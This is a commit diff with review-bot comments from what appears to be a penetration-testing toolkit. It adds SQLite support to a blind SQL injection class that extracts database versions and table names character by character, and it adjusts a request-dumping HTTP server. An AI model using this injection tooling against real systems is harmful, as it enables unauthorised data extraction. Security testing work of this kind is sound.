Added sqlite (SQLi)

Roman Hergenreder 2024-04-21 17:41:16 +02:00
parent f11f99fdf4
commit 12007c84c1
2 changed files with 44 additions and 4 deletions

@ -91,14 +91,23 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
status_code = 200 if len(result) < 1 else result[0] status_code = 200 if len(result) < 1 else result[0]
data = b"" if len(result) < 2 else result[1] data = b"" if len(result) < 2 else result[1]
headers = { } if len(result) < 3 else result[2] headers = { } if len(result) < 3 else result[2]
else: elif isinstance(result, int):
status_code = result status_code = result
data = b"" data = b""
headers = {} headers = {}
elif result is None:
status_code = 201
data = b""
headers = {}
else:
status_code = 200
data = data if type(data) in [bytes, bytearray] else str(data).encode()
headers = {}
if path in self.server.dumpRequests: if path in self.server.dumpRequests:
headers["Access-Control-Allow-Origin"] = "*" headers["Access-Control-Allow-Origin"] = "*"
headers["Connection"] = "Close"
headers["Content-Length"] = len(util.nvl(data, b"")) headers["Content-Length"] = len(util.nvl(data, b""))
if len(headers) == 0: if len(headers) == 0:
@ -174,7 +183,7 @@ class HttpFileServer(HTTPServer):
data = data.encode("UTF-8") data = data.encode("UTF-8")
headers = { headers = {
"Access-Control-Allow-Origin": "*", "Access-Control-Allow-Origin": "*"
} }
if mime_type: if mime_type:
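Review bot: In the new final `else:` branch of the first hunk, the right-hand side reads `data` instead of `result`, so a handler's string or bytes return value is never what gets sent. Unless `data` is already bound earlier in the method (outside this hunk), the line raises `UnboundLocalError`. It should presumably be `data = result if isinstance(result, (bytes, bytearray)) else str(result).encode()`. Separately, the `result is None` branch answers `201` with an empty body; if nothing is created, `204` is the conventional status, and a one-line comment on the choice would help. The enclosing method starts and ends outside the hunk.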

33
sqli.py

@ -33,6 +33,10 @@ class SQLi(ABC):
return rows return rows
@abstractmethod
def ascii(self):
pass
@abstractmethod @abstractmethod
def extract_int(self, column: str, table=None, condition=None, def extract_int(self, column: str, table=None, condition=None,
offset=None, verbose=False): offset=None, verbose=False):
@ -201,7 +205,7 @@ class BlindSQLi(SQLi, ABC):
cur_str = "" cur_str = ""
while True: while True:
found = False found = False
cur_column = f"ascii(substr({column},{len(cur_str) + 1},1))" cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))"
if charset: if charset:
query = self.build_query(cur_column, table, condition, offset) query = self.build_query(cur_column, table, condition, offset)
for c in charset: for c in charset:
@ -249,6 +253,8 @@ class PostgreSQLi(SQLi, ABC):
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class MySQLi(SQLi, ABC): class MySQLi(SQLi, ABC):
def get_database_version(self, verbose=False): def get_database_version(self, verbose=False):
@ -268,3 +274,28 @@ class MySQLi(SQLi, ABC):
return self.extract_multiple_strings("column_name", "information_schema.columns", return self.extract_multiple_strings("column_name", "information_schema.columns",
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class SQLitei(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("sqlite_version()", verbose=verbose)
def get_current_user(self, verbose=False):
raise Exception("Not implemented!")
def get_current_database(self, verbose=False):
raise Exception("Not implemented!")
def get_table_names(self, verbose=False):
return self.extract_multiple_strings("name", "sqlite_schema", f"type='table'",
verbose=verbose)
def get_column_names(self, table: str, schema: str, verbose=False):
# TODO: we could query the "sql" column and parse it using regex
raise Exception("Not implemented!")
def ascii(self):
return "unicode"
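Review bot: The three stubs in `SQLitei` (`get_current_user`, `get_current_database`, `get_column_names`) raise a bare `Exception("Not implemented!")`, which callers cannot tell apart from a failed request; `raise NotImplementedError("get_current_user is not supported for SQLite")` and the like would make the unsupported case explicit. The new abstract `ascii()` on `SQLi` returns the name of the dialect's SQL function rather than a converted value, and its name matches the Python builtin, so it needs a docstring such as `"""Return the name of the SQL function that maps a character to its code."""`. Because it is declared `@abstractmethod`, any subclass not visible on this page that lacks an override will raise `TypeError` at instantiation. In `get_table_names`, `f"type='table'"` has no placeholders and can be a plain string.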